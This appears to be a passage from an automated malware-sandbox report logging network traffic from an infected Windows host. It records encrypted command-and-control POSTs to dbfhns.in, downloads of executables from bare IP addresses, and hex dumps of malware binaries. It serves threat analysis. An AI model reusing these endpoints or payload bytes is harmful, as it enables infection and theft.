                                                            Data Ascii: EMEEEE3E1EE)EMGa}N)uE_^^[]V5HW=HtNu_^UQeEEH]USSV3W=$ AS8q Fr|HAKQSHHd AMHQj@
                                                            May 27, 2024 15:23:35.049087048 CEST1236INData Raw: 59 18 81 44 24 20 f4 2a 9d 04 81 44 24 30 ea 66 bb 37 81 44 24 14 40 02 87 21 b8 3d d8 cd 38 f7 64 24 1c 8b 44 24 1c 81 6c 24 0c 1a 75 11 74 b8 31 7a bb 79 f7 64 24 1c 8b 44 24 1c 81 6c 24 30 ff 4d 18 6e 81 44 24 20 6c 8f e2 39 b8 b9 1b f5 11 f7
                                                            Data Ascii: YD$ *D$0f7D$@!=8d$D$l$ut1zyd$D$l$0MnD$ l9d$D$l$l$k`l$09D$$^l$?OsRZd$D$<-md$,D$,l$/l$8|BD$+_D$`0D$$PM'"d$ D$ fpmd$PD$PD$,EAl$<eACj02
                                                            May 27, 2024 15:23:35.049119949 CEST1236INData Raw: 56 e8 d4 00 00 00 eb 2b 80 7d 0c 00 74 19 83 fe 10 73 14 8b 47 10 8b cf 3b f0 0f 42 c6 50 6a 01 e8 2f fe ff ff eb 0c 85 f6 75 08 56 8b cf e8 87 ff ff ff 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b
                                                            Data Ascii: V+}tsG;BPj/uV3;_^]1U}WtI9Er=G;Ev2_]hxAhxAU]faayrUQEPN3B;HF]ASVuWe
                                                            May 27, 2024 15:23:35.049151897 CEST1236INData Raw: f9 80 00 00 00 0f 82 ce 01 00 00 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 18 90 41 00 01 0f 82 da 04 00 00 0f ba 25 30 5e 44 00 00 0f 83 a7 01 00 00 f7 c7 03 00 00 00 0f 85 b8 01 00 00 f7 c6 03 00 00 00 0f 85 97 01 00 00 0f ba e7 02 73 0d 8b 06
                                                            Data Ascii: 3u%A%0^Dsvs~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0f
                                                            May 27, 2024 15:23:35.049186945 CEST1236INData Raw: 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 ea 07 74 65 8d a4 24 00 00 00 00 90 66 0f 6f 06 66 0f 6f 4e
                                                            Data Ascii: GD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tvIutFGIu
                                                            May 27, 2024 15:23:35.049218893 CEST1000INData Raw: 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 f8 2c 40 00 8b ff 08 2d 40 00 10 2d 40 00 1c 2d 40 00 30 2d 40 00 8b 44 24 0c 5e 5f c3 90 8a 06 88 07 8b 44 24 0c 5e 5f c3 90
                                                            Data Ascii: DDDDDD$,@-@-@-@0-@D$^_D$^_FGD$^_IFGFGD$^_t1|9u$r$.@$D.@Ir+$-@$.@-@-@-@F#Gr
                                                            May 27, 2024 15:23:35.049251080 CEST1236INData Raw: 54 24 0c 8b d4 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 c3 18 00 00 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 10 30 41 00 f2 0f 58 c8 66 0f d6 4c 24
                                                            Data Ascii: T$T$T$$D$~D$ff(f=|%=2fT0AXfL$D$P0Af00AfT0Af\$D$UQeEVPuuu9EttM^]L$t$tNu$$
                                                            May 27, 2024 15:23:35.049288034 CEST1236INData Raw: 00 0f 84 aa 23 00 00 83 ec 08 0f ae 5c 24 04 8b 44 24 04 25 80 7f 00 00 3d 80 1f 00 00 75 0f d9 3c 24 66 8b 04 24 66 83 e0 7f 66 83 f8 7f 8d 64 24 08 0f 85 79 23 00 00 eb 00 f3 0f 7e 44 24 04 66 0f 28 15 70 30 41 00 66 0f 28 c8 66 0f 28 f8 66 0f
                                                            Data Ascii: #\$D$%=u<$f$ffd$y#~D$f(p0Af(f(fs4f~fT0AffuL=|}f=2fL$D$f.{$T$T$T$$SD$~D$ff(f=|!=2fT`0A\fL$D$
                                                            May 27, 2024 15:23:35.054821014 CEST1236INData Raw: 74 02 ff d1 83 c6 04 3b 75 0c 72 ec 5e 5d c3 6a 08 e8 ed 31 00 00 59 c3 6a 08 e8 4e 33 00 00 59 c3 6a 1c 68 e8 7e 41 00 e8 59 14 00 00 6a 08 e8 cf 31 00 00 59 83 65 fc 00 83 3d ec 5d 44 00 01 0f 84 c9 00 00 00 c7 05 14 5e 44 00 01 00 00 00 8a 45
                                                            Data Ascii: t;ur^]j1YjN3Yjh~AYj1Ye=]D^DE^D}5H5| A]tt5H]}}};rWjx A9t;rG7jx A5H5| AE5HM9Mu9EtM]Eh!Ah


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.853069109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:37.979177952 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://faqldvcxoayalcyp.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 169
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:37.979198933 CEST169OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 0e 6b 2c 90 f4 76 0b 75 44 5e df 88
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA ,[k,vuD^,_uWxb,VP}`X+N`OE1,o^#T+hF
                                                            May 27, 2024 15:23:38.782134056 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:38 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.853070109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:38.823920965 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://nspuoowkrfsuk.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 187
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:38.823932886 CEST187OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 5e 41 b5 9b
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu^A|;E^sR@8/{QaHD]u?WDg.%Cn5)/rd6z'M,3
                                                            May 27, 2024 15:23:39.621417046 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:39 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.853072109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:39.639947891 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://gcvwrsnytusejtdk.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 334
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:39.639947891 CEST334OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 40 22 a7 b6
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu@"&FvIJQ/5%bf[rcTGS&I$QH+u[P'&d4\f"&z"XXh&vnbsNEbmhp:C&e
                                                            May 27, 2024 15:23:40.475568056 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:40 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.853073109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:40.496459961 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://jebcasiwwjgorbsq.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 133
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:23:40.496459961 CEST133OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 23 1e b4 93
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu#Ocu{PL#w+k+j#T2J
                                                            May 27, 2024 15:23:41.478162050 CEST190INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:23:41 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61
                                                            Data Ascii: #\+X$mD2 *a


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.85307523.145.40.124804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:41.498828888 CEST164OUTGET /pintxi1lv.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: 23.145.40.124


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.853078185.235.137.54807992C:\Users\user\AppData\Local\Temp\5876.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:23:44.409686089 CEST205OUTGET /file/host_so.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Host: 185.235.137.54


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.853079109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:24:02.901340961 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bshlmattfttfdb.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 269
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:24:02.901366949 CEST269OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2a 1c a3 e8
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu*5yx!f\!*wZl'zvF@o S+B*5fhnr\&%ThE'4olrzd_7R$
                                                            May 27, 2024 15:24:03.708252907 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:24:03 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.853080109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:24:03.722157001 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bngikvknmtdpor.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 135
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:24:03.722189903 CEST135OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 37 43 c3 9a
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu7C^}{X~IyS?80s}_dS.
                                                            May 27, 2024 15:24:04.526226997 CEST210INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:24:04 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13
                                                            Data Ascii: #\ Z$jDm*w_c*^nUSssD


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.85308191.202.233.231804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:24:04.539113998 CEST184OUTGET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: 91.202.233.231
                                                            May 27, 2024 15:24:05.259747028 CEST1236INHTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:24:05 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Last-Modified: Mon, 27 May 2024 13:22:08 GMT
                                                            ETag: "1e5000-6196f67744000"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1986560
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-msdos-program
                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 40 07 00 00 0c 17 00 00 00 00 00 e0 4d 07 00 00 10 00 00 00 50 07 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 [TRUNCATED]
                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@MP@@!&tCODEH>@ `DATAD)P*D@BSSn.idata!"n@.tls.rdata@P.reloct@P.rsrc&&*@PP@P
                                                            May 27, 2024 15:24:05.259778976 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: @Boolean@FalseTrue@,@Char@@SmallintX@Integerp@Byte@Word
                                                            May 27, 2024 15:24:05.259794950 CEST1236INData Raw: fa 64 75 ec 8b 06 8b 10 89 16 5e 5b c3 90 89 00 89 40 04 c3 8b c0 53 56 8b f2 8b d8 e8 9d ff ff ff 85 c0 75 05 33 c0 5e 5b c3 8b 16 89 50 08 8b 56 04 89 50 0c 8b 13 89 10 89 58 04 89 42 04 89 03 b0 01 5e 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15
                                                            Data Ascii: du^[@SVu3^[PVPXB^[PQGGSVWUQ$]$PV;SS;uCCFF;CuCF;uVu3Z]_^[SVWU2C;rpJk;wb;u
                                                            May 27, 2024 15:24:05.259813070 CEST1236INData Raw: 00 00 00 8d 4c 24 04 8b d7 2b 53 0c 8b 43 08 03 43 0c e8 db fc ff ff 83 7c 24 04 00 74 33 8d 4c 24 0c 8d 54 24 04 8b c5 e8 5d fb ff ff 83 7c 24 0c 00 75 b1 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 25 fd ff ff 8b 04 24 33 d2 89 10 e9 90 00 00 00 8d
                                                            Data Ascii: L$+SCC|$t3L$T$]|$uL$T$D$%$3L$|$t4L$T$|$fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW
                                                            May 27, 2024 15:24:05.259828091 CEST1236INData Raw: 57 55 83 c4 f4 8b fa 8b f0 c6 04 24 00 8b c6 e8 96 fe ff ff 8b d8 85 db 0f 84 82 00 00 00 8b 6b 08 8b c5 03 43 0c 8b d0 8d 0c 37 2b d1 83 fa 0c 7f 04 8b f8 2b fe 8b c6 2b c5 83 f8 0c 7d 14 8d 4c 24 01 8b d6 2b 53 08 03 d7 8b c5 e8 c5 fb ff ff eb
                                                            Data Ascii: WU$kC7+++}L$+SL$Fl$t4+cD$SS;s7+T$$$]_^[@SVWsp7y$GDu$G\[
                                                            May 27, 2024 15:24:05.259844065 CEST1236INData Raw: b8 85 47 00 e8 05 18 00 00 eb 32 8b c3 e8 b4 fd ff ff 89 45 fc 33 c0 5a 59 59 64 89 10 68 2b 23 40 00 80 3d 4d 80 47 00 00 74 0a 68 cc 85 47 00 e8 fd f0 ff ff c3 e9 2b 16 00 00 eb e5 8b 45 fc 5f 5e 5b 59 59 5d c3 8d 40 00 55 8b ec 51 53 56 57 8b
                                                            Data Ascii: G2E3ZYYdh+#@=MGthG+E_^[YY]@UQSVW3G=GufuGEa3Uh$@d1d!=MGthGuGG%)GtEP|tG
                                                            May 27, 2024 15:24:05.259859085 CEST1236INData Raw: 85 d2 74 18 50 89 c8 ff 15 44 50 47 00 59 09 c0 74 19 89 01 c3 b0 02 e9 fa 00 00 00 89 10 89 c8 ff 15 40 50 47 00 09 c0 75 eb c3 b0 01 e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c 50 47 00 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 ab 39 00 00 83 b8 00
                                                            Data Ascii: tPDPGYt@PGutP<PGYt@9t9@39t}9@3SVi9t[9^M93F3^[@PGSV=GtGu9
